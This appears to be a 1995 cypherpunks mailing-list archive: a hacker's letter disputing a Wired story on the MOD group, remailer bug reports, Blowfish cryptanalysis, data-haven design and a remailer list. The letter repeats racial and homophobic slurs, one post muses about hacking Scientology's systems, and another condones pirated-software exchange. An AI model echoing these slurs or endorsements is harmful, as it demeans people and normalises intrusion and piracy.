> better from Wired.  Your magazine, which could have had the potential
> to actually do something, has become a parody...a politically correct
> art-school project that consistently falls short of telling the whole
> story or making a solid point.  (Just another example of Kapor-Kash
> that ends up letting everyone down.)
> 
> I did however expect more from Josh Quittner.
> 
> I find it interesting that so much emphasis can be placed on an issue
> of supposed racial slurs as the focus of an imaginary "gang war,"
> especially so many years after the fact.
> 
> It's also interesting to me that people keep overlooking the fact that
> one of the first few members of our own little Legion of Doom was
> black (Paul Muad'dib.)  Maybe if he had not died a few years back that
> wouldn't be so quickly forgotten.  (Not that it makes a BIT of
> difference what color a hacker is as long as he or she has a brain and
> a modem, or these days at least a modem.)
> 
> I also find it interesting that a magazine can so easily implicate
> someone as the originator of the so-called "fighting words" that
> allegedly sparked this online-battle, without even giving a second
> thought as to the damage that this may do to the person so named.  One
> would think that a magazine would have more journalistic integrity
> than that (but then again, this IS Wired, and political correctness
> sells magazines and satisfies advertisers.) Thankfully, I'll only have
> to endure one moth of the "Gee Chris, did you know you were a racist
> redneck?" phone calls.
> 
> It's further odd that someone characterized as so sensitive to insults
> allegedly uttered on a party-line could have kept the company he did.
> Strangely enough, Quittner left out all mention of the MOD member who
> called himself "SuperNigger."  Surely, John Lee must have taken
> umbrage to an upper-middle class man of Hebrew descent so shamefully
> mocking him and his entire race, wouldn't he?   Certainly he wouldn't
> associate in any way with someone like that...especially be in the
> same group with, hang out with, and work on hacking projects with,
> would he?
> 
> Please, of course he would, and he did.  (And perhaps he still
> does...)
> 
> The whole "racial issue" was a NON-ISSUE.  However, such things make
> exciting copy and garner many column inches so keep being rehashed.
> In fact, several years back when the issue first came up, the
> statement was cited as being either "Hang up, you nigger," or "Hey,
> SuperNigger," but no one was sure which was actually said.  Funny how
> the wording changes to fit the slant of the "journalist" over time,
> isn't it?
> 
> I wish I could say for certain which was actually spoken, but alas, I
> was not privy to such things.  Despite the hobby I supposedly so
> enjoyed according to Quittner, "doing conference bridges," I abhorred
> the things.  We used to refer to them as "Multi-Loser Youps"
> (multi-user loops) and called their denizens "Bridge Bunnies."  The
> bridge referred to in the story was popularzed by the callers of the
> 5A BBS in Houston, Texas.  (A bulletin board, that I never even got
> the chance to call, as I had recently been raided by the Secret
> Service and had no computer.)  Many people from Texas did call the
> BBS, however, and subsequently used the bridge, but so did people from
> Florida, Arizona, Michigan, New York and Louisiana.  And as numbers do
> in the underground, word of a new place to hang out caused it to
> propagate rapidly.
> 
> To make any implications that such things were strictly a New York
> versus Texas issue is ludicrous, and again simply goes to show that a
> "journalist" was looking for more points to add to his (or her)
> particular angle.
> 
> This is not to say that I did not have problems with any of the people
> who were in MOD.  At the time I still harbored strong feelings towards
> Phiber Optik for the NYNEX-Infopath swindle, but that was about it.
> And that was YEARS ago.  (Even I don't harbor a grudge that long.)
> Even the dozen or so annoying phone calls I receied in late 1990 and
> early 1991 did little to evoke "a declaration of war."  Like many
> people, I know how to forward my calls, or unplug the phone.  Amazing
> how technology works, isn't it?
> 
> Those prank calls also had about as much to do with the formation of
> Comsec as bubble-gum had to do with the discovery of nuclear fission.
> (I'm sure if you really put some brain power to it, and consulted
> Robert Anton Wilson, you could find some relationships.)  At the risk
> of sounding glib, we could have cared less about hackers at Comsec.
> If there were no hackers, or computer criminals, there would be no
> need for computer security consultants.  Besides, hackers account for
> so little in the real picture of computer crime, that their existence
> is more annoyance than something to actually fear.
> 
> However, when those same hackers crossed the line and began tapping
> our phone lines, we were more than glad to go after them.  This is one
> of my only rules of action:  do whatever you want to anyone else, but
> mess with me and my livelihood and I will devote every ounce of my
> being to paying you back.  That is exactly what we did.
> 
> This is not to say that we were the only people from the computer
> underground who went to various law enforcement agencies with
> information about MOD and their antics.  In fact, the number of
> hackers who did was staggering, especially when you consider the usual
> anarchy of the underground.  None of these other people ever get
> mentioned and those of us at Comsec always take the lead role as the
> "narks," but we were far from alone.  MOD managed to alienate the vast
> majority of the computer underground, and people reacted.
> 
> All in all, both in this piece, and in the book itself, "MOD, The Gang
> That Ruled Cyberspace," Quittner has managed to paint a far too
> apologetic piece about a group of people who cared so very little
> about the networks they played in and the people who live there.  In
> the last 15 years that I've been skulking around online, people in the
> community have always tended to treat each other and the computers
> systems they voyeured with a great deal of care and respect.  MOD was
> one of the first true examples of a groupthink exercise in hacker
> sociopathy.  Selling long distance codes, selling credit card numbers,
> destroying systems and harassing innocent people is not acceptable
> behavior among ANY group, even the computer underground.
> 
> There have always been ego flares and group rivalries in the
> underground, and there always will be.  The Legion of Doom itself was
> FOUNDED because of a spat between its founder (Lex Luthor) and members
> of a group called The Knights of Shadow.  These rivalries keep things
> interesting, and keep the community moving forward, always seeking the
> newest bit of information in a series of healthy one-upsmanship.  MOD
> was different.  They took things too far against everyone, not just
> against two people in Texas.
> 
> I certainly don't condemn everyone in the group.  I don't even know a
> number of them (electronically or otherwise.)  I honestly believe that
> Mark Abene (Phiber) and Paul Stira (Scorpion) got royally screwed
> while the group's two biggest criminals, Julio Fernandez (Outlaw) and
> Allen Wilson (Wing), rolled over on everyone else and walked away free
> and clear.  This is repulsive when you find out that Win in particular
> has gone on to be implicated in more damage to the Internet (as Posse
> and ILF) than anyone in the history of the computing.  This I find
> truly disgusting, and hope that the Secret Service are proud of
> themselves.
> 
> Imagine if I wrote a piece about the terrible treatment of a poor
> prisoner in Wisconsin who was bludgeoned to death by other inmates
> while guards looked away.  Imagine if I tried to explain the fact that
> poor Jeff Dahmer was provoked to murder and cannibalism by the mocking
> of adolescent boys who teased and called him a faggot.  How would you
> feel if I tried to convince you that we should look upon him with pity
> and think of him as a misunderstood political prisoner?  You would
> probably feel about how I do about Quittner's story.
> 
> 'Hacker' can just as easily be applied to "journalists" too, and with
> this piece Quittner has joined the Hack Journalist Hall of Fame,
> taking his place right next to Richard Sandza.
> 
> Quittner did get a few things right.  I do have a big cat named Spud,
> I do work at a computer company and I do sell fantastic t-shirts.  Buy
> some.
> 
> With Love,
> 
> Chris Goggans
> aka Erik Bloodaxe
> 
>  =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
> 
>                  http://fringeware.com/staff/jonl
>


-- 
_______________________________________________________________________________
Paul Ferguson                         
US Sprint                                          tel: 703.689.6828
Managed Network Engineering                   internet: paul@hawk.sprintmrn.com
Reston, Virginia  USA                             http://www.sprintmrn.com 



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pstemari@erinet.com (Paul J. Ste. Marie)
Date: Sun, 15 Jan 95 19:30:40 PST
To: cypherpunks@toad.com
Subject: Re: FAREWELL TO A.R.S. (fwd)
Message-ID: <pstemari.80.00736736@erinet.com>
MIME-Version: 1.0
Content-Type: text/plain


Now the cypherpunks are going to get blamed for anything that happens to the 
"Church" of Scientology.  Sigh:

In article <3f86hh$6gj@ag.oro.net> smj@smudge.oro.net (Scott Jennings) writes:
> ... 
>Homer Wilson Smith (homer@math.cornell.edu) wrote:

>: ...  is a joke.  Their rmgroup message did exactly nothing except create
>: 10 more newgroup message and a total war zone on alt.config.  They are
>: not only pissing off the cypherpunks, but also pissing off the people
>: of alt.config.  If they continue, this war may spread from the internet
>: into the real world as cypherpunks start to hack Church accounts and
>: communication lines everywhere, causing total disruption of Scientology.
>:  
>:      If all the cypherpunks and hackers and crackers and phone freaks
>: and virus writers of the world unite and start to 'rmgroup Scientology', who 
>: do you think will win? ...


	Paul J. Ste. Marie,
	pstemari@well.sf.ca.us, pstemari@erinet.com


	




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Sun, 15 Jan 95 22:36:00 PST
To: cypherpunks@toad.com
Subject: CP meeting lost&found
Message-ID: <v01510100ab3fc06255b6@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


Did anyone notice a left over coat at the CP meeting? My friend seems to be
unable to locate his. It's a purple Timberland with white leather trims.
The coat has very important mail in the inside pocket.

Thanks,


-- Lucky Green <shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jml@wizard.synapse.net
Date: Sun, 15 Jan 95 20:50:35 PST
To: Homer Wilson Smith <homer@math.cornell.edu>
Subject: Re: bug in remailers
Message-ID: <199501160449.XAA15798@sentinel.synapse.net>
MIME-Version: 1.0
Content-Type: text/plain


>     If the remailers are working correctly, then one way you can be
>getting garbled postings is if your files are being garbled while you are
>pgping them.  Have you tried to pgp your files TO YOURSELF, and then unpgp
>them to see if they come out ok? 

Yes I have tried that. No problem they come out ok.

>     Does the bug happen on the remailers when things are not pgp'd?

Well no problem with anon@penet.fi. I'll try other remailers that permit 
unpgp'ed messages and get back to you.
 


-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2

mQCNAy8X2ZIAAAEEALbeB9136vtAk/FOOb8a1rYv7OWAVJZMiWs/CI1Hla9iUxBj
hv+KM1rK31cygbk2/y38cZFQupgP34/0HkLKXsl5bP7vifXi5JzyNpeOmYT3Cr/E
FqyWRFUo6dyp7AVm23ryZGZAM2qfcdXaslEqWAD3PczAnQ34vKhVa3SvpHjhAAUR
tAZ3aXphcmQ=
=syn9
-----END PGP PUBLIC KEY BLOCK-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jonathan Cooper <entropy@IntNet.net>
Date: Sun, 15 Jan 95 21:04:09 PST
To: Ian Farquhar <ianf@sydney.sgi.com>
Subject: Re: Crypto functions
In-Reply-To: <9501161145.ZM27648@wiley.sydney.sgi.com>
Message-ID: <Pine.SV4.3.91.950115235145.23581A-100000@xcalibur>
MIME-Version: 1.0
Content-Type: text/plain


> Well, I wasn't the original person who said that they wouldn't use it,
> but I would agree.  It's too new.  It looks very good so far, but until it's
> been through a lot more analysis than Blowfish has received so far, it is
> too much of an unknown quantity.

   Ah.  Incidentally, I wasn't just being a wiseass when I asked why, I 
wanted to know.  

   Has no one significantly cryptanalysed Blowfish yet?

-jon

( --------[ Jonathan D. Cooper ]--------[ entropy@intnet.net ]-------- )
( PGP 2.6.2 keyprint: 31 50 8F 82 B9 79 ED C4  5B 12 A0 35 E0 9B C0 01 )
( home page: http://taz.hyperreal.com/~entropy/ ]---[ Key-ID: 4082CCB5 )




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Homer Wilson Smith <homer@math.cornell.edu>
Date: Sun, 15 Jan 95 20:54:25 PST
To: jml@wizard.synapse.net
Subject: Re: bug in remailers
In-Reply-To: <199501160449.XAA15798@sentinel.synapse.net>
Message-ID: <Pine.SUN.3.91.950115235403.24201A-100000@math>
MIME-Version: 1.0
Content-Type: text/plain



    I am getting the same errors, even without pgp!
 
    homer


On Sun, 15 Jan 1995 jml@wizard.synapse.net wrote:

> >     If the remailers are working correctly, then one way you can be
> >getting garbled postings is if your files are being garbled while you are
> >pgping them.  Have you tried to pgp your files TO YOURSELF, and then unpgp
> >them to see if they come out ok? 
> 
> Yes I have tried that. No problem they come out ok.
> 
> >     Does the bug happen on the remailers when things are not pgp'd?
> 
> Well no problem with anon@penet.fi. I'll try other remailers that permit 
> unpgp'ed messages and get back to you.
>  
> 
> 
> -----BEGIN PGP PUBLIC KEY BLOCK-----
> Version: 2.6.2
> 
> mQCNAy8X2ZIAAAEEALbeB9136vtAk/FOOb8a1rYv7OWAVJZMiWs/CI1Hla9iUxBj
> hv+KM1rK31cygbk2/y38cZFQupgP34/0HkLKXsl5bP7vifXi5JzyNpeOmYT3Cr/E
> FqyWRFUo6dyp7AVm23ryZGZAM2qfcdXaslEqWAD3PczAnQ34vKhVa3SvpHjhAAUR
> tAZ3aXphcmQ=
> =syn9
> -----END PGP PUBLIC KEY BLOCK-----
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jml@wizard.synapse.net
Date: Sun, 15 Jan 95 21:00:04 PST
To: Homer Wilson Smith <homer@math.cornell.edu>
Subject: Re: bug in remailers
Message-ID: <199501160459.XAA15941@sentinel.synapse.net>
MIME-Version: 1.0
Content-Type: text/plain


>    I am getting the same errors, even without pgp!
> 
>    homer

Well to tell the truth I'm glad that I'm not the only one it's happening to. 
This seems a fairly serious problem. (To anonymous remailers sysadmin) Is 
this something new? Must be I guess. (Paranoid mode on). Sabotage?
-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2

mQCNAy8X2ZIAAAEEALbeB9136vtAk/FOOb8a1rYv7OWAVJZMiWs/CI1Hla9iUxBj
hv+KM1rK31cygbk2/y38cZFQupgP34/0HkLKXsl5bP7vifXi5JzyNpeOmYT3Cr/E
FqyWRFUo6dyp7AVm23ryZGZAM2qfcdXaslEqWAD3PczAnQ34vKhVa3SvpHjhAAUR
tAZ3aXphcmQ=
=syn9
-----END PGP PUBLIC KEY BLOCK-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Homer Wilson Smith <homer@math.cornell.edu>
Date: Sun, 15 Jan 95 21:03:12 PST
To: jml@wizard.synapse.net
Subject: Re: bug in remailers
In-Reply-To: <199501160459.XAA15941@sentinel.synapse.net>
Message-ID: <Pine.SUN.3.91.950116000253.24413A-100000@math>
MIME-Version: 1.0
Content-Type: text/plain



     Am looking to find out why...


On Sun, 15 Jan 1995 jml@wizard.synapse.net wrote:

> >    I am getting the same errors, even without pgp!
> > 
> >    homer
> 
> Well to tell the truth I'm glad that I'm not the only one it's happening to. 
> This seems a fairly serious problem. (To anonymous remailers sysadmin) Is 
> this something new? Must be I guess. (Paranoid mode on). Sabotage?
> -----BEGIN PGP PUBLIC KEY BLOCK-----
> Version: 2.6.2
> 
> mQCNAy8X2ZIAAAEEALbeB9136vtAk/FOOb8a1rYv7OWAVJZMiWs/CI1Hla9iUxBj
> hv+KM1rK31cygbk2/y38cZFQupgP34/0HkLKXsl5bP7vifXi5JzyNpeOmYT3Cr/E
> FqyWRFUo6dyp7AVm23ryZGZAM2qfcdXaslEqWAD3PczAnQ34vKhVa3SvpHjhAAUR
> tAZ3aXphcmQ=
> =syn9
> -----END PGP PUBLIC KEY BLOCK-----
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jml@wizard.synapse.net
Date: Sun, 15 Jan 95 21:12:49 PST
To: cypherpunks@toad.com
Subject: Re: Interesting problem with remailers
Message-ID: <199501160512.AAA16114@sentinel.synapse.net>
MIME-Version: 1.0
Content-Type: text/plain


>To: lce@wwa.com (Larry E)
>From: jml@wizard.synapse.net
>Subject: Re: Interesting problem with remailers

>>Try pgp -eat instead of pgp -ea.  Please let me know if that solves
>>your problem; I'm curious.

No doesn't make any difference. Seems I'm not the only one to have this problem.
-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2

mQCNAy8X2ZIAAAEEALbeB9136vtAk/FOOb8a1rYv7OWAVJZMiWs/CI1Hla9iUxBj
hv+KM1rK31cygbk2/y38cZFQupgP34/0HkLKXsl5bP7vifXi5JzyNpeOmYT3Cr/E
FqyWRFUo6dyp7AVm23ryZGZAM2qfcdXaslEqWAD3PczAnQ34vKhVa3SvpHjhAAUR
tAZ3aXphcmQ=
=syn9
-----END PGP PUBLIC KEY BLOCK-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matthew J Ghio <mg5n+@andrew.cmu.edu>
Date: Sun, 15 Jan 95 21:19:41 PST
To: Remailer-Operators@c2.org
Subject: Re: interesting problem with remailers (answer to FAQ)
In-Reply-To: <Pine.SUN.3.91.950115232616.23706A-100000@math>
Message-ID: <Yj6U5s200bkIM6yUwn@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


> I have encrypted this message with the public key of homer@rahul.net
> using the pgp -ea command (for armour).

Use -t




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Homer Wilson Smith <homer@math.cornell.edu>
Date: Sun, 15 Jan 95 21:24:33 PST
To: jml@wizard.synapse.net
Subject: Re: bug in remailers
In-Reply-To: <199501160459.XAA15941@sentinel.synapse.net>
Message-ID: <Pine.SUN.3.91.950116002314.24783A-100000@math>
MIME-Version: 1.0
Content-Type: text/plain



     Bug dead.
 
     It was unique to my remailer and was not a problem to other remailers.
 
     Christ, you just shouldn't let me near a keyboard.

     Rahul is out of reach for the moment, but I will fix it at first
chance.
 
     Homer
 
On Sun, 15 Jan 1995 jml@wizard.synapse.net wrote:

> >    I am getting the same errors, even without pgp!
> > 
> >    homer
> 
> Well to tell the truth I'm glad that I'm not the only one it's happening to. 
> This seems a fairly serious problem. (To anonymous remailers sysadmin) Is 
> this something new? Must be I guess. (Paranoid mode on). Sabotage?
> -----BEGIN PGP PUBLIC KEY BLOCK-----
> Version: 2.6.2
> 
> mQCNAy8X2ZIAAAEEALbeB9136vtAk/FOOb8a1rYv7OWAVJZMiWs/CI1Hla9iUxBj
> hv+KM1rK31cygbk2/y38cZFQupgP34/0HkLKXsl5bP7vifXi5JzyNpeOmYT3Cr/E
> FqyWRFUo6dyp7AVm23ryZGZAM2qfcdXaslEqWAD3PczAnQ34vKhVa3SvpHjhAAUR
> tAZ3aXphcmQ=
> =syn9
> -----END PGP PUBLIC KEY BLOCK-----
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Johnathan Corgan <jcorgan@scruznet.com>
Date: Mon, 16 Jan 95 00:32:14 PST
To: shamrock@netcom.com>
Subject: RE: CP meeting lost&found
Message-ID: <Chameleon.4.01.950116003148.jcorgan@jcorgan.sj.scruznet.com>
MIME-Version: 1.0
Content-Type: text/plain


>Did anyone notice a left over coat at the CP meeting? My friend seems to be
>unable to locate his. It's a purple Timberland with white leather trims.
>The coat has very important mail in the inside pocket.

Yes.  As we were leaving, Katy was asking around for the owner of the jacket.
I assume she probably still has it or it is at SGI for safekeeping.

==
Johnathan Corgan       "Violence is the last refuge of the incompetent."
jcorgan@scruznet.com                    -Isaac Asimov






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Homer Wilson Smith <homer@math.cornell.edu>
Date: Sun, 15 Jan 95 21:39:50 PST
To: jml@wizard.synapse.net
Subject: Re: bug in remailers
In-Reply-To: <199501160459.XAA15941@sentinel.synapse.net>
Message-ID: <Pine.SUN.3.91.950116003926.25022C-100000@math>
MIME-Version: 1.0
Content-Type: text/plain



    OK, its fixed.  Sorry.  Homer


On Sun, 15 Jan 1995 jml@wizard.synapse.net wrote:

> >    I am getting the same errors, even without pgp!
> > 
> >    homer
> 
> Well to tell the truth I'm glad that I'm not the only one it's happening to. 
> This seems a fairly serious problem. (To anonymous remailers sysadmin) Is 
> this something new? Must be I guess. (Paranoid mode on). Sabotage?
> -----BEGIN PGP PUBLIC KEY BLOCK-----
> Version: 2.6.2
> 
> mQCNAy8X2ZIAAAEEALbeB9136vtAk/FOOb8a1rYv7OWAVJZMiWs/CI1Hla9iUxBj
> hv+KM1rK31cygbk2/y38cZFQupgP34/0HkLKXsl5bP7vifXi5JzyNpeOmYT3Cr/E
> FqyWRFUo6dyp7AVm23ryZGZAM2qfcdXaslEqWAD3PczAnQ34vKhVa3SvpHjhAAUR
> tAZ3aXphcmQ=
> =syn9
> -----END PGP PUBLIC KEY BLOCK-----
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Rothenberg <rrothenb@libws4.ic.sunysb.edu>
Date: Sun, 15 Jan 95 22:42:17 PST
To: Ben.Goren@asu.edu
Subject: Re: Another problem w/Data Havens...
In-Reply-To: <v02110101ab3f4b2da617@[129.219.97.131]>
Message-ID: <9501160642.AA07182@toad.com>
MIME-Version: 1.0
Content-Type: text


A couple of days ago I wrote:

> >[. . .]
> >How does one keep a site from becomming a remote pirated-software exchange
> >site? [. . . .]
> 
> Simple. The file is deleted upon retrevial.
> 

Assuming that data haven does. I imagine some wouldn't, to allow for long-
term storage or retrieval by multiple parties (which, for data havens to be
viable as a commodity would probably be supported in some way as a feature)


> --
> Ben.Goren@asu.edu, Arizona State University School of Music
>  Finger ben@tux.music.asu.edu for PGP public key ID 0x875B059.

	Rob

Rob Rothenburg Walking-Owl, SUNY @ Stony Brook <rrothenb@ic.sunysb.edu>



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Rothenberg <rrothenb@libws4.ic.sunysb.edu>
Date: Sun, 15 Jan 95 22:50:06 PST
To: asgaard@sos.sll.se (Mats Bergstrom)
Subject: Re: Another problem w/Data Havens...
In-Reply-To: <Pine.HPP.3.91.950115145754.101B-100000@cor.sos.sll.se>
Message-ID: <9501160649.AA07279@toad.com>
MIME-Version: 1.0
Content-Type: text


A couple of days ago I wrote:

> > such a service could become a magnet for the "elite warez" crowd...
> 
> 
> What's wrong with young, curious eLiTiStS running storing sites for
> mutual benefits ('warez')? Some say copyright is dead. Others have
> taken this to their hearts, especially for private use, and I don't
> blame them. Copyrighted data on a server in a jurisdiction that
> doesn't acknowledege the copyrights - a prime use for Data Havens
> when they come of age.

I'm not saying anything is wrong with it.... just that it is a problem
that can lead the "authorities" to try to shut down the site, esp. when
the pornography bogieman wears out (pun intended ;).  Strangely, even
though it's more socially acceptable for people to use "borrowed" wares
there's poorer arguments for defending it than "pornography"... hardly
any cries of foul happen when a board or site is busted for pirated
software than pornography.

Basically, what I'm saying is that it's an issue that data haven admins
should keep in mind (esp. if there's a fee): perhaps they can most safely
be run in jurisdictions with lax or no copyright laws.

> 
> Mats
> 
Rob




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Handler <grendel@netaxs.com>
Date: Sun, 15 Jan 95 23:04:34 PST
To: Cypherpeople <cypherpunks@toad.com>
Subject: Cryptanalysis of Blowfish (Was: Re: Crypto functions)
In-Reply-To: <Pine.SV4.3.91.950115235145.23581A-100000@xcalibur>
Message-ID: <Pine.SUN.3.91.950116020138.20362A-100000@unix1.netaxs.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 15 Jan 1995, Jonathan Cooper wrote:

>    Has no one significantly cryptanalysed Blowfish yet?

	Bruce Schneier is running a contest. First person to come up with 
a significant attack against full Blowfish (no partial round variants) 
gets $1000. The contest ends in April. Last time I heard, he had gotten a 
very interesting attack from someone, but not a complete one. He plans to 
reveal the results after the contest ends in April.

-mbh-
--
Michael Handler                                         <grendel@netaxs.com>
Civil Liberty Through Complex Mathematics                   Philadelphia, PA
PGP Key ID FC031321  Print: 9B DB 9A B0 1B 0D 56 DA  61 6A 57 AD B2 4C 7B AF
"Toi qui fais au proscrit ce regard calme et haut" -- Baudelaire * Skotoseme





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wcs@anchor.ho.att.com (bill.stewart@pleasantonca.ncr.com +1-510-484-6204)
Date: Sun, 15 Jan 95 23:38:23 PST
To: perry@imsi.com
Subject: Re: Jude Milhon in WIRED
Message-ID: <9501160735.AA22438@anchor.ho.att.com>
MIME-Version: 1.0
Content-Type: text/plain


Oh, come on, Perry - your memory must be decaying.
I've met Jude 3-4 times in the last 1.5 years, including at
Bay Area cypherpunks meetings (the long boring photo-shoot for
the NY Times Magazine, for instance), and it's been referred to
in the past that "cypherpunks" was her pun.  She's also the one
who put out requests for character contributions to a novel
she's doing, which went to the list.  Besides, if you're grumpy that
you haven't met someone, you need to get out here to the left coast
more often - New York winters must be getting to you :-)

			Bill




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wcs@anchor.ho.att.com (bill.stewart@pleasantonca.ncr.com +1-510-484-6204)
Date: Mon, 16 Jan 95 00:59:40 PST
To: cypherpunks@toad.com
Subject: Re: How do I know if its encrypted?
Message-ID: <9501160856.AA23138@anchor.ho.att.com>
MIME-Version: 1.0
Content-Type: text/plain


Ben writes:
> Paul, I think we're after two different objectives here.
> You want Alice to  be sure that Dave can't read her file;
> I want Dave to be sure that he can't read Alice's files.

Yeah.  Picking threat models is important.
Alice's job is easy; she can just encrypt stuff.
The problems are a bit different if the file can only be retrieved
by Alice, or if she can give retrieval tokens to Bob, Carol,
and alt.sex.spam.

If Dave is running a free or cheap service, he also may
need to prevent his site from becoming load-spammed by the
permanent floating warez+porno crowd.  (As Eric pointed out,
it's a policy-vs-mechanism issue; it's easier to run a service
if you've got mechanisms to support any policy you want.)

If Dave's charging for service, charging separately for
storage and retrieval can help - that lets the one-storage,
many-retrieval model work without having to use mechanisms like
automatic deletion-after-reading, which may not be useful for
some applications.  

For Dave to be sure he can't read Alice's files, he can't 
depend on Alice encrypting them - aside from entropy models
which are generally not very useful, Alice could always
encrypt the data and then publish the key.  So he has to do it.
Here're 1.5 approaches that can work for some threats:

Alice wants to store message M, using a key K known to Alice.
(K could be hash H(M) if desired, or sent to Dave along with M.)
Dave calculates H(K), encrypts M with K, stores E(M;K) under name H(K),
and then discards K.  To retrieve files, Alice sends either K or H(K).
There's some risk at storage - Dave is receiving the file,
so he's vulnerable to cops between the time he PGP-decrypts the 
message and the time he re-encrypts and destroys the key,
but it's brief, and can be automated so he doesn't see it in person;
he could still be coerced into eavesdropping future storage
unless there's a good blinded variant on the method.

Alice needs to keep or K or give it to her friends.
If retrievals use K, Dave can decrypt on transmission (some risk,
some potential revenue).  This has the advantage that Dave doesn't
know the access token to retrieve a given file across the net,
so he can't tell the cops what to scan for.

If retrievals only use H(K), he can't decrypt on retrieval, 
so even if the cops coerce Alice or bribe Bob into retrieving it,
Dave doesn't see the content again; it's probably a lot safer for Dave.
The risk is that cops who break Dave's system or coerce him into
giving them the files will know to look for H(K) on other systems;
scanning the net for anything that might hash to H(K) is much harder.
Also, Alice might want to give Bob and Carol H(K) to retrieve the files,
but not give them K to decrypt until later, or might send K
through other channels that only the In Crowd get.

Another extension is for Dave to store the file as H(H(K)), 
to make it more work to match access tokens against files -
Dave has the advantage of not even knowing the access token
(which the retrieve-with-K method has) as well as not letting Dave decrypt.

Using user-selected keys instead of message hashes is obviously a 
lot faster, since Dave doesn't have to calculate them,
and makes it a bit easier for Alice to memorize the keys 
instead of storing them, but it requires more Syntax in the requests,
and increases the chances of wimpy keys and especially collisions
(which essentially never happen in hash-based systems, but are more
common if people want to use keys like "Secret Plans".)
And Alice can always store the hashes encrypted and stegoed,
or store an index file on the datahaven and give her friends
the access tokens for that instead of her whole collection.
Hashes are also safer for Dave if Alice is compromised or spam is a problem,
since he doesn't have to respond to requests for "spam1.gif" or
"Nuclear Narcoterrorist KiddyPorn Monthly" or "Windows_for_95.c",
which is riskier than requests for 0x402930be89a9c901.

			Bill




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Mon, 16 Jan 95 03:24:02 PST
To: tcmay@netcom.com (Timothy C. May)
Subject: Re: Jude Milhon in WIRED
In-Reply-To: <199501160356.TAA09359@netcom2.netcom.com>
Message-ID: <9501161122.AA05896@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



Timothy C. May says:
> I'm not sure what Perry's not having heard of Jude Milhon is supposed
> to mean, or how "Wired" interviewing her is "another example of the
> continuing decay," etc.
> 
> In any case, Jude Milhon has been active in the hacker-writer
> community, going back to the 1970s.

Sorry. Everyone seems to be assuring me that I should know her and
that she's a longtime friend of Eric's, but I must admit that I've
no memory of anything she's done. I believe people who say she's the
origin of the term "cypherpunk", but I must admit to still having no
real knowledge of who this person is.

In any case, I apologize for my ignorance and will try be on less of a
hair trigger in the future. However, following a long stream of Wired
interviews of bizarrely marginal community members, I simply assumed
this was Yet Another.

> Anyone who professes to be "disappointed" by "Wired" was clearly taken
> in by their hype.

I'm disappointed by them because they once used to care about getting
facts in articles right and about discussing meaningful issues, and
now they don't. They used to be a cross between the Economist and
Mondo 2000, and now they are just Mondo 2001. When you try to count
inaccuracies on the average page, you run out of interest in
continuing the exercise before you run out of errors. They also used
to have a point of view. They also used to have substantive articles,
and now they have cover stories on "Zippies!"

I'm not renewing my subscription.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@CS.Berkeley.EDU>
Date: Mon, 16 Jan 95 06:49:49 PST
To: cypherpunks@toad.com
Subject: List of reliable remailers
Message-ID: <199501161450.GAA11071@kiwi.CS.Berkeley.EDU>
MIME-Version: 1.0
Content-Type: text/plain


   I operate a remailer pinging service which collects detailed
information about remailer features and reliability.

   To use it, just finger remailer-list@kiwi.cs.berkeley.edu

   There is also a Web version of the same information, at:
http://www.cs.berkeley.edu/~raph/remailer-list.html

   This information is used by premail, a remailer chaining and PGP
encrypting client for outgoing mail, which is available at:
ftp://ftp.csua.berkeley.edu/pub/cypherpunks/premail/premail-0.30.tar.gz

   For the PGP public keys of the remailers, as well as some help on
how to use them, finger remailer.help.all@chaos.bsu.edu

This is the current info:

                                 REMAILER LIST

   This is an automatically generated listing of remailers. The first
   part of the listing shows the remailers along with configuration
   options and special features for each of the remailers. The second
   part shows the 12-day history, and average latency and uptime for each
   remailer. You can also get this list by fingering
   remailer-list@kiwi.cs.berkeley.edu.

$remailer{"vox"} = "<remail@vox.xs4all.nl> cpunk pgp. post";
$remailer{"avox"} = "<anon@vox.hacktic.nl> cpunk pgp post";
$remailer{"extropia"} = "<remail@extropia.wimsey.com> cpunk pgp special";
$remailer{"portal"} = "<hfinney@shell.portal.com> cpunk pgp hash";
$remailer{"alumni"} = "<hal@alumni.caltech.edu> cpunk pgp hash";
$remailer{"bsu-cs"} = "<nowhere@bsu-cs.bsu.edu> cpunk hash ksub";
$remailer{"rebma"} = "<remailer@rebma.mn.org> cpunk pgp hash";
$remailer{"soda"} = "<remailer@csua.berkeley.edu> eric post";
$remailer{"penet"} = "<anon@anon.penet.fi> penet post";
$remailer{"ideath"} = "<remailer@ideath.goldenbear.com> cpunk hash ksub";
